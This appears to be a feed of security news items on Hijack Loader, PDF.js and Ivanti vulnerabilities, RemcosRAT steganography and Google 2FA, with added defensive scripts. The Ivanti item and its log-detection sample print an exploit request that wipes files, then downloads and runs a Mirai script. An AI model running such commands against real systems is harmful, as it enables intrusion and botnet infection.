CYBERSECURITY / DEFENSE / INTELLIGENCE

  • “Defenders think in lists, attackers think in graphs,” said John Lambert from Microsoft, distilling the fundamental difference in mindset between those who defend IT systems and those who try to compromise them. The traditional approach for defenders is to list security gaps directly related to their assets in the network and eliminate as many as possible, starting with the most critical.


  • A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar. “These enhancements aim to increase the malware’s stealthiness, thereby remaining undetected for longer periods of time,” Zscaler ThreatLabz researcher Muhammed Irfan V A said in a technical report. “Hijack


  • A critical vulnerability has been discovered in PDF.js that could let an attacker execute arbitrary JavaScript when a victim opens a malicious PDF. PDF.js is Mozilla's open-source library for rendering PDF files in the browser without plugins or external software.

    The flaw affects any browser or application that embeds PDF.js, including applications that use it through React-PDF.

    Mozilla's PDF.js is the original open-source library for rendering PDF documents inside a browser; React-PDF builds on it to integrate PDF.js into React applications.

    With PDF files in such wide use, the vulnerability potentially affects millions of PDF users as well as the React applications that rely on React-PDF.


    PDF.js is the default PDF viewer built into Mozilla Firefox and is embedded by many other web applications, which is what makes the exposure so broad.

    The issue has been fixed upstream in PDF.js and, for the React wrapper, by Wojciech Maj, the react-pdf project's maintainer.

    Two CVEs track the issue: CVE-2024-34342 for react-pdf and CVE-2024-4367 for Mozilla PDF.js.

    Technical Analysis

    CVE-2024-34342 : React-pdf’s PDF.js Vulnerable To Arbitrary JavaScript Execution

    This vulnerability is in react-pdf and is triggered by a malicious PDF file.

    Two conditions must hold for exploitation: the application must load the attacker's PDF through PDF.js, and PDF.js must be configured with `isEvalSupported` set to `true` (the upstream default).

    When both hold, the attacker's JavaScript runs in the origin of the site hosting the viewer, with whatever access that page has.

    The vulnerability was rated 7.1 (High). React-pdf's fix forces `isEvalSupported` to `false`, which removes the attack vector; applications that call PDF.js directly can apply the same setting themselves.

    CVE-2024-4367: Mozilla PDF.js Could Allow For Arbitrary Code Execution

    This is the upstream flaw in Mozilla's PDF.js library: a crafted PDF can make PDF.js execute attacker-supplied JavaScript in the context of the page or application hosting the viewer.

    Moreover, depending on the user's privileges, an attacker who exploits this vulnerability could “install programs; view, change, or delete data; or create new accounts with full user rights.”

    The root cause is the one react-pdf inherited: PDF.js defaults `isEvalSupported` to `true`, and in that mode it turns font data from the document into JavaScript source and compiles it, so a malicious font can smuggle code into what gets compiled.

    A severity score had not yet been assigned to this vulnerability at the time of writing.

    Regardless, users should upgrade affected products to the latest versions; applications that embed PDF.js directly should also pass `isEvalSupported: false` to `getDocument()` until they are on a fixed release.
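    As an added example (this is the editor's illustration, not PDF.js or React-PDF code), the following JavaScript models the bug class behind `isEvalSupported`: a renderer that splices untrusted, font-derived drawing commands into JavaScript source and compiles it with the Function constructor, beside an interpreter that never generates code. The command format, `getGlyphRenderer` and the toy path recorder are hypothetical; only the option name mirrors the PDF.js setting, and the malicious glyph is constructed for the example.

```javascript
// Added example: models the bug class behind PDF.js's isEvalSupported option.
// Not PDF.js or React-PDF code; the command format, getGlyphRenderer and the
// path recorder are hypothetical. Only the option name mirrors the real setting.

// Toy stand-in for a canvas 2D context that records the drawing calls it receives.
function makePath() {
  const ops = [];
  return {
    ops,
    moveTo(x, y) { ops.push(["moveTo", x, y]); },
    lineTo(x, y) { ops.push(["lineTo", x, y]); },
  };
}

// Vulnerable path: glyph commands (which in a PDF come from font data the
// attacker controls) are spliced into JavaScript source and compiled. An operand
// that is not a number closes the call expression and injects arbitrary code.
function compileGlyphUnsafe(cmds) {
  let src = "";
  for (const [op, x, y] of cmds) {
    src += `c.${op}(${x}, ${y});\n`;
  }
  return new Function("c", src);
}

// Hardened path: no code generation. Each command is interpreted, the opcode
// must be in an allow-list and every operand must be a finite number.
const ALLOWED_OPS = new Set(["moveTo", "lineTo"]);
function interpretGlyph(cmds) {
  return function (c) {
    for (const [op, x, y] of cmds) {
      if (!ALLOWED_OPS.has(op)) throw new TypeError(`unknown op ${String(op)}`);
      if (!Number.isFinite(x) || !Number.isFinite(y)) throw new TypeError("operand is not a number");
      c[op](x, y);
    }
  };
}

// Chooses the path the way the option does: eval only when explicitly enabled.
function getGlyphRenderer(cmds, { isEvalSupported = false } = {}) {
  return isEvalSupported ? compileGlyphUnsafe(cmds) : interpretGlyph(cmds);
}

// Constructed inputs. The malicious glyph's x operand ends the moveTo call,
// runs attacker code, then reopens a call so the generated source still parses.
const benignGlyph = [["moveTo", 0, 0], ["lineTo", 10, 10]];
const maliciousGlyph = [["moveTo", "0, 0); globalThis.pwned = true; c.moveTo(0", 0]];

function demo() {
  const results = {};
  globalThis.pwned = false;

  const benign = makePath();
  getGlyphRenderer(benignGlyph)(benign);
  results.benignOps = benign.ops.length;            // 2 recorded drawing calls

  // isEvalSupported: true, so the attacker's code runs when the glyph is rendered.
  getGlyphRenderer(maliciousGlyph, { isEvalSupported: true })(makePath());
  results.pwnedWithEval = globalThis.pwned;         // true

  // isEvalSupported: false, so the same glyph is rejected before anything executes.
  globalThis.pwned = false;
  try {
    getGlyphRenderer(maliciousGlyph, { isEvalSupported: false })(makePath());
    results.rejected = false;
  } catch (e) {
    results.rejected = e instanceof TypeError;
  }
  results.pwnedWithoutEval = globalThis.pwned;      // false
  return results;
}

console.log(demo());
```

    The point of the interpreter is not that it validates better, but that there is no string of code to validate: with `isEvalSupported: false` the untrusted values only ever reach a numeric check and a method call, never a parser.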


    The post Critical PDF.js & React-PDF Vulnerabilities Threaten Millions Of PDF Users appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Juniper Threat Labs has reported active exploitation attempts targeting vulnerabilities in Ivanti Pulse Secure VPN appliances.

    These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide.


    CVE-2023-46805: Authentication Bypass

    CVE-2023-46805 is a critical flaw in Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways that lets a remote, unauthenticated attacker bypass authentication and reach restricted resources.

    The flaw lies in the /api/v1/totp/user-backup-code endpoint, which is reachable without authentication but does not adequately validate the request path. A path-traversal sequence appended to it (../../) lets the request escape into other API endpoints that should require authentication.

    Affected versions are 9.x and 22.x of both Ivanti Connect Secure and Ivanti Policy Secure.

    CVE-2024-21887: Command Injection

    The second vulnerability, CVE-2024-21887, is a command injection flaw in the web components of Ivanti Connect Secure and Ivanti Policy Secure.

    A specially crafted request makes the appliance execute arbitrary commands.

    The injection point is the /api/v1/license/keys-status/ API call: text placed after the path is passed to a shell, so a request can carry a full command sequence.

    That endpoint normally requires authentication, so attackers chain CVE-2023-46805 to reach it unauthenticated and then inject their payload, which yields shell command execution and malware delivery, including the Mirai botnet.


    Mirai Botnet Delivery

    Juniper Threat Labs’ analysis has revealed instances where attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.

    The following is the observed request, URL-decoded (the download host is defanged):

    GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1

    The command sequence wipes the current directory, downloads a script from a remote server, makes it executable and runs it, which can lead to infection of the appliance.

    The content of wtf.sh is not reproduced here; the file names it uses include several offensive and derogatory terms and were shown in the original research only.

    The script tries five directories in turn: /tmp, /var/run, /mnt, /root and /. Once it finds one it can enter, it downloads a file called “lol” from a fixed URL (http://192[.]3[.]152[.]183/mips).

    It then makes the downloaded file executable and runs it with the argument “0day_machine”. The directory changes are chained with “||”, so each subsequent cd runs only if the previous one failed.

    As a result, the download and execution take place in the first directory in the list that the script can reach.

    Juniper analysed the payloads and identified them as Mirai variants, which indicates the severity of the threat posed by these vulnerabilities.

    The exploitation of Ivanti Pulse Secure's vulnerabilities for Mirai botnet delivery underscores the evolving threat landscape.

    Juniper Networks SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against these vulnerabilities using specific signatures for CVE-2023-46805 and CVE-2024-21887.

    Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities.
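    As an added example (the editor's illustration, not Juniper's signatures or any Ivanti tooling), the following Node.js script scans web-server access-log lines for the two-stage pattern described above: a traversal out of /api/v1/totp/user-backup-code/ (CVE-2023-46805) and shell text after /api/v1/license/keys-status/ (CVE-2024-21887), then extracts the injected command and any download URLs from it. The log lines are constructed for the example, the target is percent-decoded twice to catch double-encoded traversal, and `198.51.100.77` is a documentation address standing in for the attacker's host.

```javascript
// Added example: access-log detection for the Ivanti exploit chain. Not vendor
// code; the log format and sample lines are constructed for this illustration.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Jan/2024:10:01:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5123',
  '203.0.113.9 - - [10/Jan/2024:10:01:07 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/;rm%20-rf%20*;%20cd%20/tmp;%20wget%20http://198.51.100.77/wtf.sh;%20chmod%20777%20wtf.sh;%20./wtf.sh HTTP/1.1" 200 118',
  '203.0.113.9 - - [10/Jan/2024:10:01:09 +0000] "GET /api/v1/totp/user-backup-code/..%252f..%252flicense/keys-status/;id HTTP/1.1" 200 74',
  '203.0.113.11 - - [10/Jan/2024:10:02:00 +0000] "GET /api/v1/license/keys-status/ HTTP/1.1" 403 0',
].join("\n");

const REQUEST_LINE = /"([A-Z]+) (\S+) HTTP\/[\d.]+"/;
const URL_RE = /https?:\/\/[^\s;'"]+/g;
const TOTP_BACKUP = "/api/v1/totp/user-backup-code/";
const KEYS_STATUS = "/api/v1/license/keys-status/";

// Strip the query string and percent-decode twice so double-encoded traversal
// (%252e%252e%252f) is seen as "../". Malformed escapes are left as they are.
function decodeTarget(target) {
  let p = target.split("?", 1)[0];
  for (let i = 0; i < 2; i++) {
    try { p = decodeURIComponent(p); } catch (e) { break; }
  }
  return p;
}

// Collapse "." and ".." segments the way a router would, to see which endpoint
// the request really lands on. Duplicate slashes are collapsed as well.
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  return "/" + out.join("/") + (p.endsWith("/") && out.length ? "/" : "");
}

function analyseRequest(target) {
  const decoded = decodeTarget(target);
  const resolved = normalizePosix(decoded);
  const findings = { cves: [], resolved, command: null, urls: [] };

  // CVE-2023-46805: traversal out of the unauthenticated TOTP backup-code endpoint.
  if (decoded.startsWith(TOTP_BACKUP) && decoded.includes("/../")) {
    findings.cves.push("CVE-2023-46805");
  }
  // CVE-2024-21887: anything after keys-status/ is shell text. In observed
  // attacks it usually begins with ';' to terminate the appliance's own command.
  if (resolved.startsWith(KEYS_STATUS) && resolved.length > KEYS_STATUS.length) {
    findings.cves.push("CVE-2024-21887");
    const command = decoded.split("keys-status/")[1].replace(/^[; ]+/, "");
    findings.command = command;
    findings.urls = command.match(URL_RE) || [];   // payload hosts worth blocking
  }
  return findings.cves.length ? findings : null;
}

function scanLog(text) {
  const hits = [];
  for (const line of text.split("\n")) {
    const m = REQUEST_LINE.exec(line);
    if (!m) continue;
    const result = analyseRequest(m[2]);
    if (result) hits.push({ target: m[2], ...result });
  }
  return hits;
}

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.cves.join("+"), "|", hit.command, "|", hit.urls.join(" "));
}
```

    A legitimate, authenticated call to /api/v1/license/keys-status/ with nothing after the path produces no finding, so the check keys on the traversal and on trailing shell text rather than on the endpoint names alone.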

    Indicators of Compromise

    Hash Values of Mirai: 

    F20da76d75c7966abcbc050dde259a2c85b331c80cce0d113bc976734b78d61d
    d6f5fc248e4c8fc7a86a8193eb970fe9503f2766951a3e4b8c084684e423e917
    8f0c5baaca3b81bdaf404de8e7dcca1e60b01505297d14d85fea36067c2a0f14
    10686a12b7241a0836db6501a130ab67c7b38dbd583ccd39c9e655096695932e
    5fcbe868a8c53b7146724d579ff82252f00d62049a75a04baa4476e300b42d15
    a843971908aa31a81d96cc8383dcde7f386050c6e3437ad6a470f43dc2bf894b
    cf1b85d4812f7ee052666276a184b481368f0c0c7a43e6d5df903535f466c5fd
    575f0acd67df2620378fb5bd8379fd2f2ba0539b614986d60e85822ba0e9aa08
    5d155f86425b02e45a6a5d62eb8ce7827c9c43f3025bffd6d996aabd039d27f9
    1e6d93a27b0d7e97df5405650986e32641696967c07df3fa8edd41063b49507b
    b9d92f637996e981006173eb207734301ff69ded8f9c2a7f0c9b6d5fcc9063a2
    038187ceb4df706b13967d2a4bff9f67256ba9615c43196f307145a01729b3b8
    850d3521693b4e1ec79981b3232e87b0bc22af327300dfdc7ea1b7a7e97619cd
    b0bc9a42a874cab6583e4993de7cc11a2b8343a4453bda97b83b0c2975e7181d
    3d19de117388d50e5685d203683c2045881a92646c69ee6d4b99a71bf65dafa7
    4e2c5513cf1c4a3c12c6e108d0120d57355b3411c30d59dfb0d263ad932b6868 

    53f6cedcf89fccdcb6b4b9c7c756f73be3e027645548ee7370fd3486840099c4
    67d989388b188a817a4d006503e5350a1a2af7eb64006ec6ad6acc51e29fdcd5
    9b5fe87aaa4f7ae1c375276bfe36bc862a150478db37450858bbfb3fb81123c2
    3e785100c227af58767f253e4dfe937b2aa755c363a1497099b63e3079209800
    5b20ed646362a2c6cdc5ca0a79850c7d816248c7fd5f5203ce598a4acd509f6b
    c27b64277c3d14b4c78f42ca9ee2438b602416f988f06cb1a3e026eab2425ffc


    The post Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Hackers are now using steganography techniques to distribute the notorious Remote Access Trojan (RAT) known as RemcosRAT.

    This method, which involves hiding malicious code within seemingly innocuous image files, marks a concerning evolution in malware delivery tactics.

    The Initial Breach: Word Documents and RTF Files

    The AhnLab Security Intelligence Centre (ASEC) recently found steganography being used to spread RemcosRAT.

    The attack begins with a seemingly harmless Word document that contains an external link.

    The document uses template injection: the external link points to a remote template, so Word fetches attacker-controlled content as soon as the file is opened.

    A Word document containing an external link

    Upon opening the document, an RTF file is downloaded and executed.

    This RTF exploits a known vulnerability in the Equation Editor component (EQNEDT32.EXE) of Microsoft Office, which results in the download of a VBScript, disguised with a misleading “.jpg” extension, from a command-and-control (C2) server.

    Another VBScript is fetched from “paste.ee”, a service for uploading and sharing text snippets.

    VBScript downloaded by the RTF file

    The Steganography Technique

    The downloaded VBScript is heavily obfuscated, making it difficult for traditional antivirus software to detect the malicious intent.

    This script executes a PowerShell command, which further downloads an image from an external source.

    The obfuscated script (eh1G4)

    The cunning aspect of this attack lies within the downloaded image file.


    The image carries Base64-encoded data appended after the “FF D9” marker, the end-of-image marker that closes a JPEG's picture data, so image viewers render the picture normally and ignore the trailer. The PowerShell script locates the data between the “<<BASE64 START>>” and “BASE64_END” markers and decodes it.

    The PowerShell script downloading a steganography image

    The decoded data is a .NET DLL, which is then loaded and executed directly from memory (reflective code loading) rather than being written to disk as a file.

    The Base64-encoded data contained in a normal image file
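    The extraction step described above, as an added example (the editor's illustration, not ASEC's analysis script or the attackers' PowerShell): a small Node.js parser that isolates whatever follows a JPEG's FF D9 marker, pulls the Base64 blob from between the two markers, decodes it and checks whether the result carries a PE header. The marker strings are taken from the description above; the sample image and the embedded PE stub are constructed for the example and are neither a valid picture nor a real executable.

```javascript
// Added example: trailer extraction for JPEG-based steganography of this kind.
// Not ASEC or attacker code; the sample image and PE stub are constructed.
const START_MARKER = Buffer.from("<<BASE64 START>>");
const END_MARKER = Buffer.from("BASE64_END");

// Bytes after the JPEG end-of-image marker (FF D9). A viewer stops at EOI, so
// whatever follows is never displayed. lastIndexOf is used because an embedded
// EXIF thumbnail may carry its own FF D9; a Base64 text trailer cannot contain 0xFF.
function trailingData(image) {
  if (image[0] !== 0xff || image[1] !== 0xd8) throw new Error("not a JPEG (missing SOI marker)");
  const eoi = image.lastIndexOf(Buffer.from([0xff, 0xd9]));
  if (eoi === -1) throw new Error("no EOI marker found");
  return image.subarray(eoi + 2);
}

// Decode the Base64 blob hidden between the markers in the trailer.
function extractPayload(image, start = START_MARKER, end = END_MARKER) {
  const trailer = trailingData(image);
  const i = trailer.indexOf(start);
  if (i === -1) return null;
  const j = trailer.indexOf(end, i + start.length);
  if (j === -1) return null;
  const blob = trailer.subarray(i + start.length, j).toString("ascii").replace(/\s+/g, "");
  if (!/^[A-Za-z0-9+/]*={0,2}$/.test(blob)) return null;   // reject junk before decoding
  return Buffer.from(blob, "base64");
}

// Rough type check: an MZ header whose e_lfanew points at "PE\0\0" is a PE image.
// A .NET DLL is a PE file with a CLR header; that deeper check is left out here.
function classify(payload) {
  if (payload.length >= 0x40 && payload.toString("ascii", 0, 2) === "MZ") {
    const eLfanew = payload.readUInt32LE(0x3c);
    if (payload.toString("latin1", eLfanew, eLfanew + 4) === "PE\0\0") return "pe";
    return "mz-without-pe";
  }
  return "unknown";
}

function scanImage(image) {
  const trailer = trailingData(image);
  const payload = extractPayload(image);
  return {
    trailerBytes: trailer.length,
    hasPayload: payload !== null,
    payloadType: payload ? classify(payload) : null,
    payloadSize: payload ? payload.length : 0,
  };
}

// Constructed test input: a JPEG-shaped byte string (SOI, a JFIF APP0 segment,
// filler, EOI) followed by a trailer wrapping a fake PE stub. The stub holds only
// an MZ header and a PE signature; it is not a real executable.
function buildSample() {
  const stub = Buffer.alloc(0x60);
  stub.write("MZ", 0, "ascii");
  stub.writeUInt32LE(0x40, 0x3c);
  stub.write("PE\0\0", 0x40, "latin1");
  const jpeg = Buffer.concat([
    Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10]),
    Buffer.from("JFIF\0\x01\x01\0\0\x01\0\x01\0\0", "latin1"),
    Buffer.alloc(32),
    Buffer.from([0xff, 0xd9]),
  ]);
  const trailer = Buffer.from(`\n${START_MARKER}\n${stub.toString("base64")}\n${END_MARKER}\n`, "ascii");
  return Buffer.concat([jpeg, trailer]);
}

console.log(scanImage(buildSample()));
```

    On a real sample, replace `buildSample()` with `fs.readFileSync(path)`; a non-zero `trailerBytes` on an image that a viewer opens cleanly is itself the signal worth alerting on, before any markers are looked for.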

    Final Execution: RemcosRAT Deployment

    The script doesn't stop there: it downloads an additional file from the C2 server, spawns RegAsm.exe (a legitimate .NET utility) as a child process and uses process hollowing to replace that process's code with the downloaded file.

    This ultimately leads to the execution of RemcosRAT on the victim's machine.

    RemcosRAT executed through process hollowing

    Given the diverse methods through which Remcos RAT can be distributed, including spam emails and disguised crack software download links, users are urged to exercise extreme caution.

    Keeping antivirus solutions updated to the latest version is also recommended to block such malware infections preemptively.

    This sophisticated use of steganography to conceal and deliver malware represents a significant shift in the landscape of cyber threats.

    As attackers continue to innovate, the importance of maintaining robust cybersecurity practices and awareness among users cannot be overstated.


    The post Hackers Employing Steganography Methods to Deliver Notorious RemcosRAT appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • A high-severity flaw impacting the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue admin accounts on susceptible websites. The findings come from WPScan, which said that the vulnerability (CVE-2023-40000, CVSS score: 8.3) has been leveraged to set up bogus admin users with the names wpsupp‑user 


  • Google has announced an update to its two-factor authentication (2FA) process, also known as 2-step Verification (2SV), aimed at simplifying the setup and making it easier for users to secure their accounts.

    The changes rolled out on Monday, May 6, 2024, will affect both personal and Google Workspace accounts.

    One of the key changes is the elimination of the requirement to provide a phone number before adding an authenticator app or hardware security key as the second verification step.


    Users can now directly set up Google Authenticator, other time-based one-time password (TOTP) apps, or hardware security keys as their preferred 2FA method.

    For those opting for hardware security keys, Google offers two options on the “Passkeys and security keys” page.

    Users can either register a FIDO1 credential on the security key or create a passkey, which registers a FIDO2 credential.

    The latter option requires users to set a PIN on the security key for local verification.


    Google Workspace users may still be required to enter their password alongside their passkey if the admin policy for “Allow users to skip passwords at sign-in by using passkeys” remains turned off.

    However, if a user decides to turn off 2FA from their account settings, their enrolled second steps, such as backup codes or Google Authenticator, will no longer be automatically removed, unlike the previous behavior.

    The update is expected to streamline the 2FA setup process and provide users with more flexibility in choosing their preferred authentication method.

    It also aims to make it easier for administrators to enforce 2SV policies within their organizations, contributing to overall account security.

    Google’s commitment to enhancing account security is further demonstrated by the fact that over 400 million Google accounts have started using passkeys over the past year for passwordless authentication.

    As cyber threats continue to evolve, the adoption of modern authentication methods like FIDO2 becomes increasingly crucial in protecting users from phishing and credential-replay attacks.


    The post Google Simplifies Two-Factor Authentication Setup Process appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • The Pentagon has started to use the technology, but challenges lie ahead.


  • U.S. SOCOM wants to use new tools to give small teams a big punch.
